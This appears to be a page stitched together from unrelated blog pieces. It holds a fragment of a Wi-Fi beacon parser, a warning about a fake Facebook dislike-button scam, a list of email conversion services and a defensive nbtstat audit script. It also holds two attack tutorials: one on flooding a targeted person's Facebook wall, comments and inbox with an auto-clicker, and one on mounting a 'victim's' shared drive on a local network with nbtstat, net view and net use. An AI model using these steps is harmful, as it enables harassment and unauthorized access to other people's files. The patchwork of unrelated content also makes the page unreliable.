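    caps = struct.unpack_from("<H", frame, 34)[0]
    ssid, hidden, pos = None, True, 36   # no SSID element counts as hidden
    while pos + 2 <= len(frame):         # walk the tagged elements
        tag, length = frame[pos], frame[pos + 1]
        value = frame[pos + 2 : pos + 2 + length]
        if len(value) < length:
            break                        # truncated element: stop, do not guess
        if tag == 0:
            hidden = not any(value)      # empty or all-NUL SSID is "hidden"
            ssid = None if hidden else value.decode("utf-8", errors="replace")
            break
        pos += 2 + length
    return {
        "bssid": ":".join(f"{b:02x}" for b in frame[16:22]),  # address 3
        "ssid": ssid,
        "hidden": hidden,
        "protected": bool(caps & PRIVACY),
    }

if __name__ == "__main__":
    for frame in (build_beacon("HomeAP", True), build_beacon("CafeOpen", False)):
        print(parse_beacon(frame))
```

The Privacy bit only says that a key is required, not whether the network uses WEP, WPA or WPA2; that is carried in later tagged elements, which this decoder skips. A network that reports "protected": False here is an open one, and anyone in range can read its traffic the same way.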

'Enable Dislike Button' scam on Facebook

Whenever I hated a status message or a shared link on Facebook, I said to myself, "I wish this thing had a dislike button to express my distress." This must have crossed your mind too, especially after disliking some video on YouTube. Well, this urge to dislike posts on FB is what hackers are targeting next. So beware! A quick overview of how the hackers get you to click on the link follows:

Following is a screenshot of how the message would be posted on your wall..
Pay close attention to the 'Enable Dislike Button' link beside 'Comment', in place of the usual share link. The hackers have done this to fool users into believing it is a genuine feature added by FB. There is no official dislike button on FB.

Clicking on the link will have the same consequences you might have experienced with the WTF video or the "Check who is visiting your profile" link. The link will be posted on the walls of random friends and the cycle will continue. It is believed that the link contains obfuscated JavaScript which is used by spammers to study browsing behavior.

Another example relating to the Dislike Button:
This link tricks you into pasting JavaScript into your browser. *Not at all recommended.
Repeating Again - "FB does not provide a Dislike feature"

Thursday, March 8, 2012

How to Flood Facebook Wallpost/Comment/Message

1) A Facebook Account and a slave (of course)

2) Auto-Clicker (In this tutorial we will use Auto Clicker v2.2 by Shocker)
Download: You can download it at the Official Site : http://www.shockingsoft.com/AutoClicker.html
NOTE: Detections are false positives. If you don't trust me you can run it sandboxed.
3) The most important is BRAIN and COMMON SENSE

INSTRUCTIONS:

1) Login to your Facebook account. Then after logging in, open another tab/window then go to "m.facebook.com" (without quotes)

2) Go to friends, then type your slave's name then click Search. Now go to your slave's profile.

3) Now for the third step, I will cut this into 3 parts, Wall post Flood, Comment Flood and Messaging Flood.

-Wall post Flood-

1) Open Auto Clicker. Change the "Number of Clicks" to "9999". NOTE: Leave all the settings as they are except the "Number of Clicks".

2) Put your comment on the text box. Then press F2. NOTE: Don't put your cursor on the "Post" button yet. Just place it in a blank space. Now after pressing F2, you will see the countdown of the Auto-Clicker at your task bar.

3) Now after you saw the progress of click at the task bar place your cursor on the "Post" button.

4) Now leave your cursor on the "Post" button while the Auto-Clicker runs. Leave it for at least a minute.

5) Finished. You've just flooded his Wall.

-Comment Flood-

NOTE: In this tutorial we will Comment Flood a profile picture. But you can also use Comment Flooding in Wall posts and other posts/pics/videos that can be commented on. Just use your common sense on how to do it.

1) Open Auto Clicker. Change the "Number of Clicks" to "9999". NOTE: Leave all the settings as they are except the "Number of Clicks".

2) Click your slave's profile picture.

3) Pick a photo you want to comment on. (You can use Next and Previous Button to Navigate to his other Profile Pics.)

4) Put your comment on the text box. Then press F2. NOTE: Don't put your cursor on the "Comment" button yet. Just place it in a blank space. Now after pressing F2, you will see the countdown of the Auto-Clicker at your task bar

5) Now after you saw the progress of click at the task bar place your cursor on the "Comment" button.

6) Now leave your cursor on the "Comment" button while the Auto-Clicker runs. Leave it for at least a minute.

7) Finished. You've just comment flooded a profile picture of your slave

-Message Flood-

1) Open Auto Clicker. Change the "Number of Clicks" to "9999". NOTE: Leave all the settings as they are except the "Number of Clicks".

2) Click "Messages" beside his profile picture.

3) Put anything in the "Subject" and "Body Message".

4) Then press F2. NOTE: Don't put your cursor on the "Send" button yet. Just place it in a blank space. Now after pressing F2, you will see the countdown of the Auto-Clicker at your task bar.

5) Now after you saw the progress of click at the task bar place your cursor on the "Send" button.

6) Now leave your cursor on the "Send" button while the Auto-Clicker runs. Leave it for at least a minute.

7) Finished! You've just flooded an Inbox of your slave

Friday, March 2, 2012

Hack Shared Data

Step 1
Get IP using netstat command.

Step 2
Open a DOS prompt by going to Start/Run.
Type "cmd" in the Run box. Press OK.
This is what you will see:
C:\Documents and Settings\>

c:\windows>nbtstat -a 192.168.92.2

You will see:
NetBIOS Remote Machine Name Table

Name             Type      Status
---------------------------------------------------------------
user       <00>  UNIQUE    Registered
workgroup  <00>  GROUP     Registered
user       <03>  UNIQUE    Registered
user       <20>  UNIQUE    Registered

MAC Address = xx-xx-xx-xx-xx-xx
---------------------------------------------------------------
If you don't get the number <20>, the victim has disabled File and Printer Sharing; find another victim.

Step 3
Type:
c:\windows>net view \\192.168.92.2
The output will be:

Shared resources at \\192.168.92.2

Sharename   Type   Used as   Comment

CDISK       Disk   xxxxx     xxxxx
The work is done.
"Disk" shows that the victim is sharing a disk named CDISK.

Step 4
Type the command below. You can replace x: with any letter you want, but not one of your own drive letters (not compulsory).
CDISK is the name of the shared hard drive.

c:\windows>net use x: \\192.168.92.2\CDISK

If the command is successful we will get the confirmation:
The command was completed successfully
Now open Windows Explorer or just double-click the My Computer icon on your desktop and you will see a new network drive X:> .

Now you are in his system.


This only works on a local network connection (like in a college, bank, office, etc.), and the victim must have shared data on his PC.
Check out guyz....
Do dis AT your own Risk.....
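An administrator can run the same nbtstat check across their own machines to find the ones that still register the <20> name, meaning File and Printer Sharing is switched on. The script below is an added example, not part of the original post: the function names are hypothetical, and the nbtstat text and the 192.0.2.x addresses are constructed sample input modelled on the table in Step 2.

```python
import re

ROW = re.compile(
    r"^[ \t]*(?P<name>\S.*?)[ \t]*<(?P<suffix>[0-9A-Fa-f]{2})>[ \t]+"
    r"(?P<type>UNIQUE|GROUP)[ \t]+(?P<status>\w+)", re.M)

# Meaning of the name suffixes that appear in the nbtstat table.
SERVICES = {
    ("00", "UNIQUE"): "Workstation service",
    ("00", "GROUP"): "Workgroup or domain name",
    ("03", "UNIQUE"): "Messenger service",
    ("20", "UNIQUE"): "File Server service (file and printer sharing)",
}

# Constructed sample output for a host with sharing enabled.
WITH_SHARING = """\
NetBIOS Remote Machine Name Table

Name               Type         Status
---------------------------------------------
user<00>           UNIQUE       Registered
workgroup <00>     GROUP        Registered
user <03>          UNIQUE       Registered
user <20>          UNIQUE       Registered

MAC Address = xx-xx-xx-xx-xx-xx
"""
# The same host after File and Printer Sharing is disabled: no <20> row.
WITHOUT_SHARING = "\n".join(
    line for line in WITH_SHARING.splitlines() if "<20>" not in line)

def parse_name_table(text):
    """Return one dict per name-table row found in nbtstat -a output."""
    rows = []
    for m in ROW.finditer(text):
        key = (m["suffix"].upper(), m["type"])
        rows.append({"name": m["name"], "suffix": key[0], "type": key[1],
                     "status": m["status"], "service": SERVICES.get(key, "other")})
    return rows

def sharing_exposed(text):
    """True when the host registers the <20> File Server name."""
    return any(r["suffix"] == "20" and r["type"] == "UNIQUE"
               and r["status"] == "Registered" for r in parse_name_table(text))

def audit_hosts(outputs):
    """outputs maps host -> nbtstat text; return the hosts exposing sharing."""
    return sorted(h for h, text in outputs.items() if sharing_exposed(text))

if __name__ == "__main__":
    print(audit_hosts({"192.0.2.10": WITH_SHARING, "192.0.2.11": WITHOUT_SHARING}))
```

Every host this reports should either have File and Printer Sharing turned off or have its shares reviewed, so that nothing like CDISK is reachable without a password.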

Cool E-Mail Address U'll Love To Mail

1. pdf@koolwire.com
     All you need to do is send a file in any of these formats: Word (doc, docx), PowerPoint (ppt, pptx), Excel (xls, xlsx), Visio (vsd), MS Project (mpp), JPEG, GIF, RTF, txt to the above email address as an attachment. Shortly you'll receive an email containing the PDF version of the file you sent. Cool, isn't it!

 2. mp3@koolwire.com
     Similar service which accepts a wav file and outputs a mp3 file.

 3. ..@photos.flickr.com

       Flickr provides you with a unique email address, which you can get from here (http://www.flickr.com/account/uploadbyemail/). When you send your photographs to it as attachments, they'll appear in your Flickr gallery in a matter of minutes. The subject line of the email becomes the photo's title, while the body of the email becomes the photo's description.

 4. www@web2mail.com
      Send an email to the above address with the URL you wish to browse in the subject line of the mail. You'll get an email containing the text version of the URL you just sent. This one's a breather for people whose offices block all websites except the company webmail. When I last tried this service the response time was quite high; I guess that's a temporary problem.

 5. wsmith@wordsmith.org
     Want to know the dictionary meaning or synonyms of a word?? Send a blank email to the above address, just have a similar subject line, "define myword", without the quotes. You'll get what you want.

 I hope that was some interesting piece of information. Do share your views/comments/experience about these new services.
